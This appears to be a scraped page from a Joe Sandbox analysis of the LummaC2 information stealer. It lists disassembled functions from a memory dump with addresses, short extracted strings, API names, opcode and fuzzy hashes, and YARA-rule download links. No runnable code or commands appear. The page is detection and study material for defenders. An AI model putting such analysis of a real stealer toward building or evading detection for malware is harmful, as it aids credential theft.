Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 8e1dde27c757e722da0be4a512d10208a76afdda6c8f3621e6afe4d9b022e5b9
Instruction ID: 8900aad9e7329636613bbb7bb3cb131939c6423fcc9fee5abbaa91cde6bd2027
Opcode Fuzzy Hash: 8e1dde27c757e722da0be4a512d10208a76afdda6c8f3621e6afe4d9b022e5b9
Instruction Fuzzy Hash: CA6135B010C3924BD318DF3A94A133BFFD1AFE6754F58896DE4D68B282D63485068B66

Function 00A85640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

)G, xrefs: 00A858D4
O6E4, xrefs: 00A8593D, 00A8594C
AF, xrefs: 00A858DC

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: 3034e55d4046721c3e0ad47df36c1e1ead1b85168587f87a110c53648621b411
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: FE813A71A083508BD7149F24C89176FBBE2FFD1354F19892DE8C58B391EB798905C792

Function 00A764E0 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

tuz, xrefs: 00A7670D
pv, xrefs: 00A76702
L4, xrefs: 00A76570

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: pv$tuz$L4
API String ID: 2994545307-3236822430
Opcode ID: 5a9e0c634bfd6639ecfdbc486b3b610029250f7094a41e360f88f5d29ad25497
Instruction ID: bc1d15f761ed6f0d906331e5052297751646999ef83658484ed3fcae3ee6f005
Opcode Fuzzy Hash: 5a9e0c634bfd6639ecfdbc486b3b610029250f7094a41e360f88f5d29ad25497
Instruction Fuzzy Hash: 99810032A083528BDB24CF64DC917AB73E2EFC5314F18C938E4898B295EB749846C752

Function 00A7720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

1, xrefs: 00A77631
!, xrefs: 00A778E5

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: c775a64b847c37130169aea2c2138ba1a2d0a03372f274f2ee065c09d87e06cb
Instruction ID: f79f0a0634f60ac9735e7210cad2d616c989a37ea9b6cf60c059f9fe7cf6d797
Opcode Fuzzy Hash: c775a64b847c37130169aea2c2138ba1a2d0a03372f274f2ee065c09d87e06cb
Instruction Fuzzy Hash: 9C22F17160C3428BD725CB24DC9177F7BE2EB96314F18C96CE4DA9B2A2D7348906CB52

Function 00A64C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

0, xrefs: 00A6559A
8, xrefs: 00A65592

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 81e0b605f9e101940bccadccac8ebdb0f7d9829fd533df076f05e7d0c8cf2220
Instruction ID: 639c804e3540f559477c4364b49fd16eaf3b6e70212ea2fab5558a0a7b473f06
Opcode Fuzzy Hash: 81e0b605f9e101940bccadccac8ebdb0f7d9829fd533df076f05e7d0c8cf2220
Instruction Fuzzy Hash: B1724571A083419FD714CF28C890BAABBF1BF98714F04892DF9898B391D775D958CB92

Function 00A7CC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

06i`, xrefs: 00A7D13A
46i`, xrefs: 00A7D104

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: b6212deaaac8c21495d6298f673c7f4ba71ea997113339a12868068e884cec38
Instruction ID: ef417436957d83f86a7f38ed842ce18dcdba541d233321f2c0cc75c1672cadb1
Opcode Fuzzy Hash: b6212deaaac8c21495d6298f673c7f4ba71ea997113339a12868068e884cec38
Instruction Fuzzy Hash: ECD10476A143118BD724CF28CC5126BB7F2EFD5320F08DA2CE8999B394E7789905C791

Function 00A980C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

:, xrefs: 00A985B4
NO, xrefs: 00A98378

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: e344efdcf7f4885fb54254394e5adca5eae790c3a67c0873d12fea4ddc1e8cda
Instruction ID: 83f1c51cf8ca9c00149532b77fe0760f543dad8ce8164511891bab361523b981
Opcode Fuzzy Hash: e344efdcf7f4885fb54254394e5adca5eae790c3a67c0873d12fea4ddc1e8cda
Instruction Fuzzy Hash: 87D1E737628253CBCB149FB8DC112AB73F2FF8A751F1A8979D441872A0EB39C9558750

Function 00A9E540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

lohi, xrefs: 00A9E624, 00A9E6C5
{rsp, xrefs: 00A9E750

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: 99caf68a36748cf73d696e199783bc39f322322279a16e70c42c0a980139b7e9
Instruction ID: 6f6f312aaa12ef98ff2ea8eb0cfe7c038db714470d4e5dd9a96ee997ddce16ea
Opcode Fuzzy Hash: 99caf68a36748cf73d696e199783bc39f322322279a16e70c42c0a980139b7e9
Instruction Fuzzy Hash: 7391F7717083548FD724DF68D88066BB7E2ABD5318F19C93CE59687652EA30EC06CB92

Function 00A64310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00A6438B
IEND, xrefs: 00A64701

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: e3cc7172b031fb62800b731b3964ed9cf38b9677232cdda8572e9926d1e3110a
Instruction ID: e7046e58625b8893ee33f1a9797a3ef08818fbe6e03dc1c0112267d600703bcd
Opcode Fuzzy Hash: e3cc7172b031fb62800b731b3964ed9cf38b9677232cdda8572e9926d1e3110a
Instruction Fuzzy Hash: 23D1ADB15083449FD720CF18D845B9EBBF4EB99308F14492DF9999B382D775E908CB92

Function 00A77B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

"#, xrefs: 00A77D10
s}, xrefs: 00A77C34

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: f574bd4006e960143456d9dfa216c64cc1d345a12fc2773df04f4a0a62eced5f
Instruction ID: 4ef5685f78f58a186a7e5fa76c154dd842949fb681888f1c0e385957dd444b88
Opcode Fuzzy Hash: f574bd4006e960143456d9dfa216c64cc1d345a12fc2773df04f4a0a62eced5f
Instruction Fuzzy Hash: 3BB175B05183818BD7758F28C8917EFBBE1AF96314F14892CE4CD8B291EB758945CB92

Function 00A8C289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

@a, xrefs: 00A8C2AF
u, xrefs: 00A8C364

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: 33a38ff12f83e43c295b0608fe48ea66eaea9caff851fff3f76f22b16b8f3f64
Instruction ID: 6b93d10fae778fc039302e244a2a23b51908cc6bd1c9741e0aa179424d1671f6
Opcode Fuzzy Hash: 33a38ff12f83e43c295b0608fe48ea66eaea9caff851fff3f76f22b16b8f3f64
Instruction Fuzzy Hash: BE81D2B050C3C18FD729DF3984607ABBBD1AFAA314F18896DE4D997282D7358546CF12

Function 00A7683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

7, xrefs: 00A76991
gfff, xrefs: 00A76A5E

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: be7b39dbaacf08c28b92169655982afba73952dddd69b376adcfc34d256a956d
Instruction ID: b7c6f5daed10c68c379020f6d01f74eb5540dce7761a344637fea9f11bba0444
Opcode Fuzzy Hash: be7b39dbaacf08c28b92169655982afba73952dddd69b376adcfc34d256a956d
Instruction Fuzzy Hash: 9E916873A146114FD718CB28CC527AB77E2ABC5324F19C63DD499DB385EB7898068B82

Function 00A7AD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

x3,-, xrefs: 00A7AE6E
CM, xrefs: 00A7AF47

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: 3aabbf39a8b1f7d77aeedf7989cc65edcf0e06db32403a2036e15fa8c8fbc442
Instruction ID: 53bb9121dafeec8b4225209742538b4ee1f98a56d54ec169fbf7f86908869b05
Opcode Fuzzy Hash: 3aabbf39a8b1f7d77aeedf7989cc65edcf0e06db32403a2036e15fa8c8fbc442
Instruction Fuzzy Hash: 23914FB4911B009FC7249F39C996616BFF0FF4A310B448A5DE4DA8BB95D330E416CB96

Function 00A7D172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

[U, xrefs: 00A7D210
_8Y, xrefs: 00A7D208

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 405eb58a0320b7f6c71354836623b43eb6384481d3d444068eaf36a016d9d65d
Instruction ID: 25156f04bd7e2bb99c1097949f66a50f919b8225e5a5a4629e62771b44f5e631
Opcode Fuzzy Hash: 405eb58a0320b7f6c71354836623b43eb6384481d3d444068eaf36a016d9d65d
Instruction Fuzzy Hash: E261DEB064C3508BD700DF64DC51A6BB7F1EF92318F18896CE8899B391E739D906C796

Function 00A7D189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

[U, xrefs: 00A7D210
_8Y, xrefs: 00A7D208

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 0207ba346fa0f4f4af8e2d844598b86b5c3bc9cab6a9cc8ae1bdc85af363bc1e
Instruction ID: 3b5fc836b005e34bdee65c01c0fbc428741977fee4e5a622a4e2075804d7c95f
Opcode Fuzzy Hash: 0207ba346fa0f4f4af8e2d844598b86b5c3bc9cab6a9cc8ae1bdc85af363bc1e
Instruction Fuzzy Hash: 2F51EE7064C3108BD700DF64DC51A6BB7F1EF92304F18896CE8899B291E739D906C796

Function 00A6F2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

J, xrefs: 00A6F424
], xrefs: 00A6F3BF

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: bf756c3024930f8082fc2fecaa1db9e74442a4adfd20faf23bf658d01f451a26
Instruction ID: fd372d3d050bd362af21069b5825a588a74c66812c68141413dd849b6465ad0d
Opcode Fuzzy Hash: bf756c3024930f8082fc2fecaa1db9e74442a4adfd20faf23bf658d01f451a26
Instruction Fuzzy Hash: 4B61E973A1C7908FD3248A79988139FBBE29BD6324F194A3ED8E9D73C1D57988058742

Function 00A83C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

b"}, xrefs: 00A83CED
Z[, xrefs: 00A83CE6

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: 5cf6202fe86df006d47d55fc63e08fb48e92e294a28007342a3c4f580617d7ab
Instruction ID: 1e205c9c5697880c2bc0d45683539ad7384efdb7eaf242914b1d8181725af51a
Opcode Fuzzy Hash: 5cf6202fe86df006d47d55fc63e08fb48e92e294a28007342a3c4f580617d7ab
Instruction Fuzzy Hash: 9B61F476A483419FE314CF69D88075FBBE2EBC5704F09CA3CE9945B381C7B589068B92

Function 00A79820 Relevance: 2.7, Strings: 1, Instructions: 1444COMMON

Download Yara Rule

Strings

gd, xrefs: 00A79BE3

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gd
API String ID: 2994545307-565856990
Opcode ID: ffbed464958fb903267af9df7de0dc7546c84d41c407160a87ae7adcc3105fee
Instruction ID: 254f0e60e5b6ced31cd9119f8fde32906d16f7f04681b9d3dd29e45aadbbc037
Opcode Fuzzy Hash: ffbed464958fb903267af9df7de0dc7546c84d41c407160a87ae7adcc3105fee
Instruction Fuzzy Hash: 0192F175708341ABE724CF64DC8176FBBE2ABE5304F18C82DE58A87252D7759C46C742

Function 00A6E465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

{L, xrefs: 00A6E4BD
c, xrefs: 00A6E46F

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: 3b1788285ad143e33843838eb148897ae72650424a69b2b799188a718cba7a07
Instruction ID: cce854b70b54098331400ac2ee06dc5875c9e606cfa1ecd74cbe379e7cac3e8d
Opcode Fuzzy Hash: 3b1788285ad143e33843838eb148897ae72650424a69b2b799188a718cba7a07
Instruction Fuzzy Hash: 8F510172A0C3D04BE725CB24D8913DFBBE2EBE5344F18497CD8C997282EB755A468742

Function 00A890B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

5B3@, xrefs: 00A890C2
dV3T, xrefs: 00A890DA

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: 337e3fbd18e7885dd9d9b002b3354990af3233836854d21acbf386b5b7abd09a
Instruction ID: 1c577b2350b3e26f4e1252282ad0bb237cd4be51f16a3dbe79980ed427b2a13e
Opcode Fuzzy Hash: 337e3fbd18e7885dd9d9b002b3354990af3233836854d21acbf386b5b7abd09a
Instruction Fuzzy Hash: 5A31ECB15083948FD3108F6A884075FFBF2BBC6B04F189A2CA5D19B295C7B485028B06

Function 00A6D196 Relevance: 2.5, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00A6D196
CoUninitialize.OLE32 ref: 00A6D1A0

Memory Dump Source

Source File: 00000002.00000002.2765615262.0000000000A61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000002.00000002.2765585334.0000000000A60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765667767.0000000000AA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765690049.0000000000AA7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2765709534.0000000000AB1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a60000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 3957d6c18d05df3a52a69f69826ddd4c3bab5f17d29db0b8385e4d6bb4d81475
Instruction ID: f532ba46e9c7eb1d669b5a1be237df4c3006a4fddb5a830e4b289d21fcf9ebbc
Opcode Fuzzy Hash: 3957d6c18d05df3a52a69f69826ddd4c3bab5f17d29db0b8385e4d6bb4d81475
Instruction Fuzzy Hash: 9DC01235514043AB9608CF60DCA8075B6B1B707246B005518E403D3291CB149402851C

Function 00A74AEA Relevance: 2.3, Strings: 1, Instructions: 1080COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00A75160

Memory Dump Source

